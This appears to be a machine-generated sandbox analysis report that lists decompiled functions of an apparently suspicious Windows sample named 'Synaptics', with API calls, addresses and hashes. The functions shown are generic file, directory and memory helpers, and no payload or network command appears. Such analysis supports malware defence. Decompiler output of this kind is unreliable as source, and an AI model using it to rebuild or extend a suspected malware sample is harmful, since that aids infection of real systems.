                                                                                                                                                                                                                            • Instruction ID: 43e6c75ac53b68531ecb640d7992dcd85e2c788aaf0ad89392417452c0857e78
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7ed79bf9b14b00b121dfe9b039b901474b7428766eb3fab445e489e84394f62
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFC02BB33382001ED700EFB64C41F2E22CCDB40705F404C3EF080C2140E230C1404312
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409F54 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409F54(void* __eax) {
				int _t4;

				_t4 = CreateDirectoryA(E00404E80(__eax), 0); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                                                            0x00409f61
                                                                                                                                                                                                                            0x00409f69
                                                                                                                                                                                                                            0x00409f6d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00496EA8,00000000,00496FE6), ref: 00409F61
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                            • Opcode ID: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                                                            • Instruction ID: d06271dbac5e2ad416fd06201c67f134fcd2da453fbdd723ce63acec7380a99a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8560409eb3f1d5c0bf4fd62c23b8086ce7d4dade3db60e21e326d19d4a95f5a9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07B092A27503411AEE0035FA2CC2B2A008CA74861AF110A3EF656E61C2D47AC8184068
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0047CD00 Relevance: 1.5, APIs: 1, Instructions: 11networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: socket
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                                                                                                            • Opcode ID: da8abf5903f94204f6ea87b64a01f6fd3d4efd7f7f6d8b3f73d9ab8c59ab69f8
                                                                                                                                                                                                                            • Instruction ID: 2e709947118e8dc25288039f9a57c0887e95812f9ab550a64733bdbedfb98feb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da8abf5903f94204f6ea87b64a01f6fd3d4efd7f7f6d8b3f73d9ab8c59ab69f8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24C09BB51141086F5200DBCDDC41C6773ECDB986007004135B914C7321D570FD108675
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409BAC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00409BAC(void* __eax) {
				int _t4;

				_t4 = DeleteFileA(E00404E80(__eax)); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                                                                                                                                                                                            0x00409bb7
                                                                                                                                                                                                                            0x00409bbf
                                                                                                                                                                                                                            0x00409bc3

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000,?,0047618D,00000000,004761BC,?,00000000,?,004964CE,?,?,021E2A8C,021E2A8C,00000000,00000000,00000000), ref: 00409BB7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                                                                            • Opcode ID: 73a910ca069631e58c55fc5b667482b586c6bae095a696cf5f4582313e541121
                                                                                                                                                                                                                            • Instruction ID: bd52c39aee45128e914ff2b3ce99c6b4069be5bada1e4d33ed405c928c74b441
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73a910ca069631e58c55fc5b667482b586c6bae095a696cf5f4582313e541121
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37B012E27102400ACF0079FE3CC190E00CDA74811EF110D3FF14AE2243E83ED4180118
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045D2F8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045D2F8(signed int __eax, void* __ecx) {
				struct _ITEMIDLIST** _t10;

				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
				return  *_t10;
			}




                                                                                                                                                                                                                            0x0045d307
                                                                                                                                                                                                                            0x0045d310

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FolderLocationSpecial
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3328827890-0
                                                                                                                                                                                                                            • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                                                            • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00409B90 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00409B90(void* __eax) {
				void* _t4;
				int _t5;
				void* _t6;

				_t6 = __eax;
				_t4 =  *(__eax + 0x14);
				if(_t4 != 0xffffffff) {
					_t5 = FindClose(_t4); // executed
					 *((intOrPtr*)(_t6 + 0x14)) = 0xffffffff;
					return _t5;
				}
				return _t4;
			}






                                                                                                                                                                                                                            0x00409b91
                                                                                                                                                                                                                            0x00409b93
                                                                                                                                                                                                                            0x00409b99
                                                                                                                                                                                                                            0x00409b9c
                                                                                                                                                                                                                            0x00409ba1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00409ba1
                                                                                                                                                                                                                            0x00409ba9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                            • Opcode ID: 42b27bba4422c86fbcf350227eb01d9244553bbe8fd90662c9e60b7e3e21f40e
                                                                                                                                                                                                                            • Instruction ID: dfd6d39c8543c627b79b6cb084a4c3329f7e284b48324a05c8a470c5499769dc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42b27bba4422c86fbcf350227eb01d9244553bbe8fd90662c9e60b7e3e21f40e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCC09BB05056004BCB149E7DA9C490736996F053363600755F434EB3D7D739DC614665
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401690 Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401690(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x49e5ec; // 0x653adc
				while(_t35 != 0x49e5ec) {
					_t42 =  *_t35;
					_t43 =  *(_t35 + 8);
					if(_t44 <= _t43 && _t43 +  *((intOrPtr*)(_t35 + 0xc)) <= _v20) {
						if(_t43 < _v28) {
							_v28 = _t43;
						}
						_t31 = _t43 +  *((intOrPtr*)(_t35 + 0xc));
						if(_t31 > _v24) {
							_v24 = _t31;
						}
						_t32 = VirtualFree(_t43, 0, 0x8000); // executed
						if(_t32 == 0) {
							 *0x49e5c8 = 1;
						}
						E00401498(_t35);
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 != 0) {
					 *_v32 = _v28;
					_t27 = _v24 - _v28;
					 *((intOrPtr*)(_v32 + 4)) = _t27;
					return _t27;
				}
				return _t24;
			}
















                                                                                                                                                                                                                            0x00401694
                                                                                                                                                                                                                            0x00401697
                                                                                                                                                                                                                            0x0040169b
                                                                                                                                                                                                                            0x0040169e
                                                                                                                                                                                                                            0x004016a8
                                                                                                                                                                                                                            0x004016ac
                                                                                                                                                                                                                            0x004016b3
                                                                                                                                                                                                                            0x004016b7
                                                                                                                                                                                                                            0x00401710
                                                                                                                                                                                                                            0x004016bf
                                                                                                                                                                                                                            0x004016c1
                                                                                                                                                                                                                            0x004016c6
                                                                                                                                                                                                                            0x004016d7
                                                                                                                                                                                                                            0x004016d9
                                                                                                                                                                                                                            0x004016d9
                                                                                                                                                                                                                            0x004016df
                                                                                                                                                                                                                            0x004016e6
                                                                                                                                                                                                                            0x004016e8
                                                                                                                                                                                                                            0x004016e8
                                                                                                                                                                                                                            0x004016f4
                                                                                                                                                                                                                            0x004016fb
                                                                                                                                                                                                                            0x004016fd
                                                                                                                                                                                                                            0x004016fd
                                                                                                                                                                                                                            0x00401709
                                                                                                                                                                                                                            0x00401709
                                                                                                                                                                                                                            0x0040170e
                                                                                                                                                                                                                            0x0040170e
                                                                                                                                                                                                                            0x00401718
                                                                                                                                                                                                                            0x0040171e
                                                                                                                                                                                                                            0x00401725
                                                                                                                                                                                                                            0x0040172f
                                                                                                                                                                                                                            0x00401735
                                                                                                                                                                                                                            0x0040173d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040173d
                                                                                                                                                                                                                            0x00401747

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004016F4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: bf1da7795f9bbb57c32e3e1b3d6e17fcc49e8937ab2342caafcf9f5fcaa67994
                                                                                                                                                                                                                            • Instruction ID: 869fc0c84a99862be13868ebdbc7f118d1adf1e01b4cb4f2c24919aa0ce3646c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf1da7795f9bbb57c32e3e1b3d6e17fcc49e8937ab2342caafcf9f5fcaa67994
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7221E570608301AFD710DF5AC880A1BBBE5AB85764F14C96AF4989B3A0D334E840CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401748 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x653adc
				while(_t29 != 0x49e5ec) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, "true"); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                                                            0x0040174f
                                                                                                                                                                                                                            0x00401753
                                                                                                                                                                                                                            0x0040175a
                                                                                                                                                                                                                            0x0040176f
                                                                                                                                                                                                                            0x00401777
                                                                                                                                                                                                                            0x0040177d
                                                                                                                                                                                                                            0x00401783
                                                                                                                                                                                                                            0x00401786
                                                                                                                                                                                                                            0x004017ca
                                                                                                                                                                                                                            0x0040178e
                                                                                                                                                                                                                            0x00401794
                                                                                                                                                                                                                            0x00401798
                                                                                                                                                                                                                            0x0040179a
                                                                                                                                                                                                                            0x0040179a
                                                                                                                                                                                                                            0x004017a0
                                                                                                                                                                                                                            0x004017a2
                                                                                                                                                                                                                            0x004017a2
                                                                                                                                                                                                                            0x004017a8
                                                                                                                                                                                                                            0x004017b5
                                                                                                                                                                                                                            0x004017bc
                                                                                                                                                                                                                            0x004017be
                                                                                                                                                                                                                            0x004017c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004017c4
                                                                                                                                                                                                                            0x004017bc
                                                                                                                                                                                                                            0x004017c8
                                                                                                                                                                                                                            0x004017c8
                                                                                                                                                                                                                            0x004017d9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,?), ref: 004017B5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                            • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004017DC Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E004017DC(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x49e5ec; // 0x653adc
				while(_t19 != 0x49e5ec) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x49e5c8 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                                                                                                                            0x004017e0
                                                                                                                                                                                                                            0x004017f1
                                                                                                                                                                                                                            0x004017f8
                                                                                                                                                                                                                            0x00401801
                                                                                                                                                                                                                            0x00401805
                                                                                                                                                                                                                            0x00401808
                                                                                                                                                                                                                            0x0040180b
                                                                                                                                                                                                                            0x0040184b
                                                                                                                                                                                                                            0x00401813
                                                                                                                                                                                                                            0x00401819
                                                                                                                                                                                                                            0x0040181e
                                                                                                                                                                                                                            0x00401820
                                                                                                                                                                                                                            0x00401820
                                                                                                                                                                                                                            0x00401825
                                                                                                                                                                                                                            0x00401827
                                                                                                                                                                                                                            0x00401827
                                                                                                                                                                                                                            0x0040182b
                                                                                                                                                                                                                            0x00401836
                                                                                                                                                                                                                            0x0040183d
                                                                                                                                                                                                                            0x0040183f
                                                                                                                                                                                                                            0x0040183f
                                                                                                                                                                                                                            0x0040183d
                                                                                                                                                                                                                            0x00401849
                                                                                                                                                                                                                            0x00401849
                                                                                                                                                                                                                            0x00401858

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401A43), ref: 00401836
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: ba7e8f56dd9b63abe11c00bb54b2c9e598e0cb71057fa30d3871cf01dbab3387
                                                                                                                                                                                                                            • Instruction ID: 69a851a612f8e5332c3ed32b0bddb0d6c77ed4967d0166fa3b232cf3dee9e35f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba7e8f56dd9b63abe11c00bb54b2c9e598e0cb71057fa30d3871cf01dbab3387
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201FC73A043105BD310EE59DCC0A1777E8E795338F15853ED98467391D33AAD0187D8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004099D8 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099D8(void* __eax) {
				int _t2;

				_t2 = CloseHandle(__eax); // executed
				return _t2;
			}




                                                                                                                                                                                                                            0x004099d9
                                                                                                                                                                                                                            0x004099de

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                            • Opcode ID: 7f9678bbb8944c457b7ab340dcaecd9d84314f50dba63ffaf464203f7de856ab
                                                                                                                                                                                                                            • Instruction ID: ceb54ecbe242fc00ff43e0d48e9a5ccb5d75668868478bddb86d82c62ad848b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f9678bbb8944c457b7ab340dcaecd9d84314f50dba63ffaf464203f7de856ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                            Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                                                                                                                                                            0x00406024
                                                                                                                                                                                                                            0x00406027
                                                                                                                                                                                                                            0x0040602d
                                                                                                                                                                                                                            0x0040603a
                                                                                                                                                                                                                            0x0040603e
